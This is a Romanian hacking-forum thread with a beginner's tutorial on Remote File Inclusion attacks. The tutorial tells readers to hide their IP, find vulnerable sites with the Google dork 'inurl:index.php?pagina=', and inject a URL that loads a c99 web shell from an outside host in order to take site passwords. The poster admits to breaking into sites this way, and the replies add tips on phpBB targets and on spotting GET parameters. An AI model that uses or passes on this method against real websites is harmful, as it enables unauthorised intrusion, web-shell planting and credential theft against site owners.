Simpatie.ro - matrimoniale
RSB_Team
Ne-am mutat pe http://forum.rsb-team.com
Nou pe simpatie:
ionela24 pe Simpatie.ro
Femeie
24 ani
Prahova
cauta Barbat
25 - 47 ani
RSB_TeamReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
RSB_Team / Tutoriale /

Tutorial RFI - made by....me

Pagini: 1  
#1
alfonso
junior +
Postari: 43


Code:

Tutorial made by DD_ram
| Bun Venit! Acesta este primul tutorial facut de mine si cel mai usor.                                                  
|- Avantaje: nu puteti fi prinsi dar pt. orice caz, va rog sa instalati urmatorul program. 
|- Programe necesare 
 - | Hide Ip Platinum | - ascunderea IP-ului
 - | Acunetix Web Vulnerability Scanner | - program de scanat vulnerabilitatile site-ului respectiv
 - | shell c99 | - un micut shell
P.S: nu dau site-uri vulnerabile, va las pe voi sa cautati :P.
|-------------------------------------------------------------------------------------------------------------------------------------------------------/
! Atentie ! sunt necesare cateva cunostinte de PHP

Boon, am facut rost de programele necesare, e timpul sa ne apucam de treaba. 
Pentru inceput RFI este o vulnerabilitate. Ea inseamna "Remote File Inclusion" (includerea fisierelor prin intermediul "telecomenzii" mai pe intelesul tuturor).
Un site vulnerabil la asa ceva nu se gaseste prea usor dar sa spunem ca l-am gasit. Daca nu, probabil va intrebati "CUM DRACU' IL GASIM?", ei bine, sa zicem de site-ul meu...www.prolithic.uv.ro ce are pagina index.php. 
Ne uitam daca are dupa index.php urmatoarele index.php?pagina=RFI si incercam sa punem index.php?pagina=http://prolithic.uv.ro/c99.txt (adresa shell-ului). Daca nu merge, cautati un alt site vulnerabil, doar nu credeti
ca o sa cad de fraier sa imi spargeti site-ul :P. Cel mai bine e sa cautam pe google " inurl:index.php?pagina= " (cautati pe google fara ghilimele). Asta este cel mai bun si mai rapid mod de a gasi un site. (nu vreau sa spun)
ca ati luat Acunetix degeaba dar, cu Acunetix dureaza mult mai mult... dupa ce am gasit site-ul punem adresa shell-ului http://prolithic.uv.ro/c99.txt si vedem daca merge. Daca apare ii dam sa afle parola. Atata tot. Cel mai bine
e sa nu facem un deface (sa modificat o pagina a site-ului si sa o stricam), cel mai bine e sa trimitem un mail administratorului cu subiectul "Site-ul dumneavoastra (http://www.-------.com/ro) este vulnerabil la RFI (remote file inclusion)"
De la "Un Hacker Alb".

Atat. Astept pareri si comentarii la adresa mea de e-mail.
Al vostru DD_ram.

/End

Nu intrebati daca am spart si yo site-uri cu RFI caci, da am spart.
Shellutile nu merg, site-ul nu e inca activ....


_______________________________________
Tot ce mi se-ntampla pare sa treaca pe langa mine...Fara sa bag de seama totul trece asa cum vine...Si poate eu sunt de vina pentru tot ce mi se-ntampla...Stiu ca situatia mea acum nu-i asa de simplaLucruri pe care nu le vedeam acum ma obsedeaza...Si tot ce inainte-mi placea acum ma enerveaza...Si cateodata cad intr-o depresie totala....
p[i]o

 
   
#2
$-Geo-$
Membru RSB
Postari: 12
frate e fain ce ai scris tu acolo dar vreau sa zic ceva(sa nu iei in nume de rau):rfi cred ca sa mai postat inca vreo 2 sau 3 tutoriale si in al 2 lea rand toti stiu aceasta metoda dar degeaba ca rar mai gasesti cu google prin index.php?page= (gasesti ceva mai complex daca cauti cu vulnerabilitatea unui derivat de la php cum e phpBB care are si el mai multe vulnerabilitati rfi sau alte derivate)

 
   
#3
alfonso
junior +
Postari: 43
@$-Geo-$, stai linistit, yo nu iau nimic in nume de rau, ba dimpotriva, iau totul in ras...
ca sa vezi daca un site e vulnerabil, daca ai un prg ceva ca sa vezi si codu sursa o sa vezi undeva comanda "GET"...de obicei unele site-uri suny facute cu comanda "POST"...deci daca are GET pagina nuj yo care atunci e vulnerabil,nu?


_______________________________________
Tot ce mi se-ntampla pare sa treaca pe langa mine...Fara sa bag de seama totul trece asa cum vine...Si poate eu sunt de vina pentru tot ce mi se-ntampla...Stiu ca situatia mea acum nu-i asa de simplaLucruri pe care nu le vedeam acum ma obsedeaza...Si tot ce inainte-mi placea acum ma enerveaza...Si cateodata cad intr-o depresie totala....
p[i]o

 
   
Pagini: 1  
Mergi la